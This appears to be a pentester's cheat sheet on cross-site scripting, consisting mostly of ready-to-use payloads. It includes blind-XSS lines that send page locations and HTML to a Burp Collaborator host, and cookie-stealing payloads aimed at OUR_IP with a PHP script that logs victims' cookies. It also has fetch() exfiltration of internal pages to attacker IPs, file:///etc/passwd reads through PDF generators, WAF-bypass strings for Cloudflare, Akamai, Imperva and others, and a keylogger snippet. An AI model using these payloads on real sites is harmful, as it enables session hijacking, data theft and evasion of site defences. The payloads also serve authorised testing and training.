<img src="https://example.burpcollaborator.net/image-only" onerror='this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="https://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
<img src=x onerror='this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='fetch("https://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
<iframe src='javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
<iframe srcdoc='<script>window.location="https://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
<iframe srcdoc='<script>fetch("https://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
<object data='javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("https://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
<script src=https://example.burpcollaborator.net/script-tag></script>
<script type="text/javascript" src="https://example.burpcollaborator.net/script-tag-type"></script>
<script type="module" src="https://example.burpcollaborator.net/script-tag-module"></script>
<script nomodule src="https://example.burpcollaborator.net/script-tag-nomodule"></script>
'"><img src="https://example.burpcollaborator.net/image">
'"><img src="https://example.burpcollaborator.net/image-only" onerror='this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="https://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
'"><img src=x onerror='this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='fetch("https://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
'"><iframe src='javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
'"><iframe srcdoc='<script>window.location="https://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
'"><iframe srcdoc='<script>fetch("https://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
'"><object data='javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("https://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
'"><script src=https://example.burpcollaborator.net/script-tag></script>
'"><script type="text/javascript" src="https://example.burpcollaborator.net/script-tag-type"></script>
'"><script type="module" src="https://example.burpcollaborator.net/script-tag-module"></script>
'"><script nomodule src="https://example.burpcollaborator.net/script-tag-nomodule"></script>
javascript:window.location="https://example.burpcollaborator.net/js-scheme?"+btoa(document.location)

';"</scrpt><scrpt/src=//xss.report/c/target-1></scrpt>
1"`/import(src)'<Script/Src=//X55.is?1=[ID]><Img/OnLoad='`

Payloads from PayloadsAllTheThings

"><script src=//OUR_IP/field_name></script>

<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

0xss0rz@htb[/htb]$ mkdir /tmp/tmpserver
0xss0rz@htb[/htb]$ cd /tmp/tmpserver
0xss0rz@htb[/htb]$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started

Now we can start testing these payloads one by one by using one of them for all of input fields and appending the name of the field after our IP

<script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username field
...SNIP...

Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.

Also see Blind XSS

Session Hijacking

Payloads

PayloadsAllTheThings/XSS Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

<script>document.location='http://OUR_IP/index.php?c='+document.cookie;</script>
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Write any of these JavaScript payloads to script.js, which will be hosted on our VM

new Image().src='http://OUR_IP/index.php?c='+document.cookie

Change the URL in the XSS payload we found earlier to use script.js

<script src=http://OUR_IP/script.js></script>

If there were many cookies, we may not know which cookie value belongs to which cookie header. So, we can write a PHP script to split them with a new line and write them to a file

Save the following PHP script as index.php

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Extract existing page code

<img src=x onerror="fetch('/api/info').then(r=>r.text()).then(t=>fetch('http://10.10.16.3/log?data='+encodeURIComponent(t),{mode:'no-cors'}))">

<script>
fetch("http://domain.htb/index.php?page=existing_page")
.then(response => response.text()) 
.then(data => {
fetch("http://10.10.14.49/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script> 

If it doesn't work, try to put a js file on your webserver and fetch it:

xss.js

fetch('/api/info')
    .then(response => response.text())  // Get the response body as text
    .then(text => {
        // Send the base64-encoded response to your server
        fetch('http://10.10.14.44/data?' + btoa(text), { mode: 'no-cors' });
    });

Payload:

<img src=1 onerror="var s=document.createElement('script'); s.src='http://10.10.14.44/xss.js'; document.body.appendChild(s);">

XSS in an email / username

"><Svg/OnLoad=alert(1)>"@gmail.com

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

"><img/src/onerror=import('//domain/')>"@yourdomain.com

XSS in phone number

 +441134960000;phone-context=<script>alert(1)</script>

XSS in .css file

"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"

XSS.SWF

GitHub - evilcos/xss.swf: a tiny tool for swf hacking, just browse it:)GitHub

# https://github.com/evilcos/xss.swf
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always>

SVG Tag - Confuse filters

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

<svg>
  <script>
    /*
    <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/
  </script>

Source: https://x.com/garethheyes/status/1843331462004912389?t=wmNCIF85tvyXZ21GMJ9B6w&s=03

<svg> <script> 1<![CDATA[</script>]]>/-alert(1) </script> </svg>

<svg> <script> /* <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/ </script>

<svg><use><set attributeName="href" to="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />

Source: https://x.com/0x0SojalSec/status/1844806824983413002?t=sfLD3yJAVRjsXew1YJ40QA&s=03

<svg>
<script>alert<![CDATA[<!---->]]>
(1)</script></svg>

<svg><script>
eval('a<?>l<!>e</>rt(1)')
</script></svg>

<svg>
<script>
<!---->a<!---->l<!---->e<!---->r<!---->t<!---->(<!---->1<!---->)
</script>
<svg>

XSS Polyglots

payloads/xsspollygots.txt at main · coffinxp/payloadsGitHub

Building XSS Polyglots - Brute XSSBrute XSS

Let me BXSS ’em allMedium

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/oastify.com/).slice(2), document.documentElement.appendChild(s))//'>

</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=(alert)(1337)>
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/;{(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\

XSS Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

In search bar

http://url.com/search?title=<xss_payload>

"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"

Invisible Javascript

https://x.com/aemkei/status/1843756978147078286

Invisible code and XSS attacks

Invisible JavaScript

Header Injection

HTTP Header Exploitation

Server Side - PDF Generator

<iframe src=file:///etc/passwd></iframe>

Server Side XSS (Dynamic PDF)HackTricks

XSS to read local file

<script>
    x=new XMLHttpRequest;
    x.onload=function(){
        document.write(this.responseText)
    };
    x.open("GET","file:///etc/passwd");
    x.send();
</script>

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>

Leveraging XSS to Read Internal FilesAll Things Security

Prototype Pollution

Prototype pollution - and bypassing client-side HTML sanitizers - research.securitum.comresearch.securitum.com

For Red Teaming

JS-Tap: Weaponizing JavaScript for Red TeamsTrustedSec

GitHub - hoodoer/JS-Tap: JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients, and a "mimic" feature that automatically generates custom payloads.GitHub

GitHub - Sharpforce/XSS-Exploitation-Tool: An XSS Exploitation ToolGitHub

XSS With JSFuck

JSFuck - Write any JavaScript with 6 Characters: []()!+

WAF Bypass

WAF Bypass

"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/Bypassed/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">

# alert(origin):

W=!![];H=(W+"")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)()

Bypass Filters

4 - XSS Filter Evasion

Bypassing Whitelists With XSS Payloads in AttributesBrute XSS

# Bypass filters

## filter that removes any script tags.
<img src="test" onerror=alert("Hello") />

## alert is filtered
<img src="test" onerror=confirm("Hello") />

## The word hello is filtered
<img src="test" onerror=alert("HHelloello") />

1) alert = window["al"+"ert"] 
2) bypass () with `` 
3) replace space with / 
4) encode symbols: 
< = %3c 
> = %3e 
" = %22 
[ = %5b 
] = %5d 
` = %60

GitHub - Edr4/XSS-Bypass-FiltersGitHub

1%27/prompt?.(1)/%27
*prompt(document.domain)*
"><img src=x onerrora=confirm() onerror=confirm(1)>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<Img Src=OnXSS OnError={prompt`1`}>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(document.domain),%200);})();">Click%20me!</div>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmb GFyZSBCeXBhc3NlZCA6KQ=="))>
<iframe+/ON+onload=%20alert(/str0d/)>
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
"><body/onload="{x:onerror=alert};x"
<svg/%20src=x%20onmouseover%3D%22alert%26%230000000040%3B1)
<Img Src=OnXSS OnError=confirm(1)>

Bypass Akamai, Imperva and CloudFlare

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

payloads/xsswafbypss.txt at main · coffinxp/payloadsGitHub

"""ontoggle=[JS]
"' "'"ontoggle=[JS]

XSS WAF Bypass One payload for allEdra

Use this tricks to bypass alert block by XSS WAF

(function(x){this[x+`ert`](1)})`al` 

window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) 

document['default'+'View'][`\u0061lert`](3)

parent[/al/.source+/ert/.source](1)

parent[/al/.source.concat(/ert/.source)](2)

confirm?.(1)

CloudFlare
<Img Src=OnXSS OnError=alert(1)> 

Imperva

<Img Src=//X55.is OnLoad%0C=import(Src)// 

Akamai 
<A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)>


<svg/onload=alert/*1337*/(1)> 
<svg/onload=alert//&NewLine;(2)> 
<svg/onload=alert&sol;**&sol;(3)> 
<svg/onload=alert/&#42;&#42;/(4)> 
<svg/onload=alert&#x2F;**&#47;(5)>

Amazon / Cloudflare WAF Bypass :

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

1">K='><Svg OnLoad=(confirm)(1)>

<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe

mXSS (Mutated XSS)

Post: Mutation XSS: Explained, CVE and Challenge | Jorian Woltjerjorianwoltjer.com

https://x.com/therceman/status/1862093437467496722?t=SZ07gfch6y1Zmj83xC6whA&s=03

mXSS (Mutated Cross-Site Scripting) occurs when a browser unexpectedly processes and transforms seemingly safe HTML tags or attributes, allowing malicious scripts to bypass filters and execute.

While libraries like DomPurify are designed to mitigate such attacks, some versions have been exploited by researchers who have discovered new ways to trick the browser and bypass this defense mechanisms.

However, not every developer is aware of DomPurify, or they may choose not to use it for various reasons, opting instead to create their own filters or validators dor safe HTML. This is where mXSS becomes particularly effective in bypassing custum protection measures

<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">"&gt;
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">

WhatWaf

GitHub - Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systemsGitHub

CloudFlare

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

<Img Src=OnXSS OnError=confirm(document.cookie)>

 ‘>alert(154)</script><script/154=’;;;;;;;

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

<svg/onload=window["al"+"ert"](1337)>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
OnXSS=<Img/Src/OnError=alert(1)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/

CloudFront

">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>

Akamai

<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>

'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

Akamai: Stored XSS via cache poisoning https://twitter.com/WllGates/status/1788179999100444802

"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">

Akamai:

'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>

In Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:

/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529

Imperva

GitHub - BishopFox/Imperva_gzip_WAF_BypassGitHub

<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;
lert&#x000000028;origin&#x000029;>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

Sucuri

<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe

<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>

Amazon WAF

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

Modsecurity

<svg onload='new Function["Y000!"].find(al\u0065rt)'>

RXSS

<img src=x onerror=alert(document.domain)//

%3Csvg+on+onload%3D%28alert%29%28document.domain%29%3E

Alert(1)

'a'.replace.call`1${/./}${alert}`/

[alert][0].call(this,1)

Stored XSS

https://www\.target\.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>


"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>

ASP

Keylogger

# Keylogger example - Source TryHackMe
 <script type="text/javascript">
 let l = ""; // Variable to store key-strokes in
 document.onkeypress = function (e) { // Event to listen for key presses
   l += e.key; // If user types, log it to the l variable
   console.log(l); // update this line to post to your own server
 }
</script> 

Resources

What is cross-site scripting (XSS) and how to prevent it? | Web Security AcademyWebSecAcademy

How XSS Payloads Work with Code Examples & Preventing Them

About cross-site scripting (XSS) attacks | Veracode Docs

Cross-Site Scripting (XSS)Intigriti

Payloads

Cross Site Scripting - PANDORE | Cheatsheet for Cybersecurity

Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security AcademyWebSecAcademy

payloads/xss.txt at main · coffinxp/payloadsGitHub

GitHub - payloadbox/xss-payload-list: 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload ListGitHub

PayloadsAllTheThings/XSS Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Tools

GitHub - dwisiswant0/findom-xss: A fast DOM based XSS vulnerability scanner with simplicity.GitHub

findom-ss

GitHub - hahwul/dalfox: 🌙🦊 DalFox is an powerful open source XSS scanning tool and parameter analyzer, utilityGitHub

GitHub - blackhatethicalhacking/XSSRocket: XSSRocket it is a tool designed for offensive security and XSS (Cross-Site Scripting) attacks.GitHub

GitHub - thecybertix/CyberXS: CyberXS is an XSS Vulnerability Automation Tool made with multiple OnelinersGitHub

GitHub - s0md3v/XSStrike: Most advanced XSS scanner.GitHub

Hacker tools: XSStrike - Hunting for low-hanging fruits.Intigriti

GitHub - rix4uni/xsschecker: xsschecker tool checking reflected endpoints finding possible xss vulnerable endpoints.GitHub

beef-xss | Kali Linux ToolsKali Linux

See XSS Discovery for more tools